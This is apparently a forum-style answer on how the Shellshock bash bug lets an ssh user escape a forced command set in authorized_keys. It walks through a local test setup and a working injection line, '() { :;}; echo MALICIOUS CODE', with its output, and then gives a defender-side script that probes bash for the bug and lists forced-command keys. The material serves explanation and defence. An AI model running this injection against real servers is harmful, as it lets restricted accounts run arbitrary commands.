One example where this can be exploited is on servers with an authorized_keys forced command. When adding an entry to ~/.ssh/authorized_keys, you can prefix the line with command="foo" to force foo to be run any time that ssh public key is used. With this exploit, if the target user's shell is set to bash, they can take advantage of the exploit to run things other than the command that they are forced to.
This would probably make more sense with an example, so here is one:
sudo useradd -d /testuser -s /bin/bash testuser
sudo mkdir -p /testuser/.ssh
sudo sh -c "echo command=\\\"echo starting sleep; sleep 1\\\" $(cat ~/.ssh/id_rsa.pub) > /testuser/.ssh/authorized_keys"
sudo chown -R testuser /testuser
Here we set up a user testuser that forces any ssh connections using your ssh key to run echo starting sleep; sleep 1.
We can test this with:
$ ssh testuser@localhost echo something else
starting sleep
Notice how our echo something else doesn't get run, but the starting sleep shows that the forced command did run.
Now let's show how this exploit can be used:
$ ssh testuser@localhost '() { :;}; echo MALICIOUS CODE'
MALICIOUS CODE
starting sleep
This works because sshd sets the SSH_ORIGINAL_COMMAND environment variable to the command passed. So even though sshd ran sleep, and not the command I told it to, because of the exploit my code still gets run.
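Two defender-side checks for the scenario above, as an added example that is not part of the original answer: one runs the well-known probe that tells you whether a given bash binary still executes the trailing command of an exported function definition, the other lists the authorized_keys entries that rely on a command="..." option, since those are exactly the keys whose forced command stops being a boundary when the account shell is a vulnerable bash. The function names and the sample key lines in the comments are my own.

```shell
#!/bin/sh
# Added example, not code from the original answer.
# is_bash_vulnerable BASH: prints "vulnerable" (exit 0) or "not vulnerable" (exit 1).
# The probe exports a function whose definition has a trailing command; a patched
# bash stops parsing after the function body, a vulnerable one runs the trailer.
# The trailer only echoes a marker, nothing else is executed.
is_bash_vulnerable() {
    bash_bin="${1:-/bin/bash}"
    [ -x "$bash_bin" ] || { echo "no such binary: $bash_bin" >&2; return 2; }
    out=$(env probe='() { :;}; echo SHELLSHOCK_MARKER' "$bash_bin" -c 'echo done' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo "vulnerable"; return 0 ;;
        *)                   echo "not vulnerable"; return 1 ;;
    esac
}

# list_forced_command_keys FILE: prints "<line number>: command=\"...\"" for every
# non-comment entry that carries a command= option. Simplification: a forced
# command containing an escaped quote (\") is cut at that quote.
list_forced_command_keys() {
    keyfile="$1"
    grep -n -E '^[^#]*command="' "$keyfile" \
        | sed -E 's/^([0-9]+):.*(command="[^"]*").*/\1: \2/'
}

# count_forced_command_keys FILE: number of entries reported above.
count_forced_command_keys() {
    list_forced_command_keys "$1" | wc -l | tr -d ' '
}

# Usage against a real file and the system bash:
#   list_forced_command_keys /testuser/.ssh/authorized_keys
#   is_bash_vulnerable /bin/bash
```

Run the listing against each account's authorized_keys to find which forced commands you are relying on, then run the probe against every bash on the host; a "vulnerable" result means those forced commands currently restrict nothing.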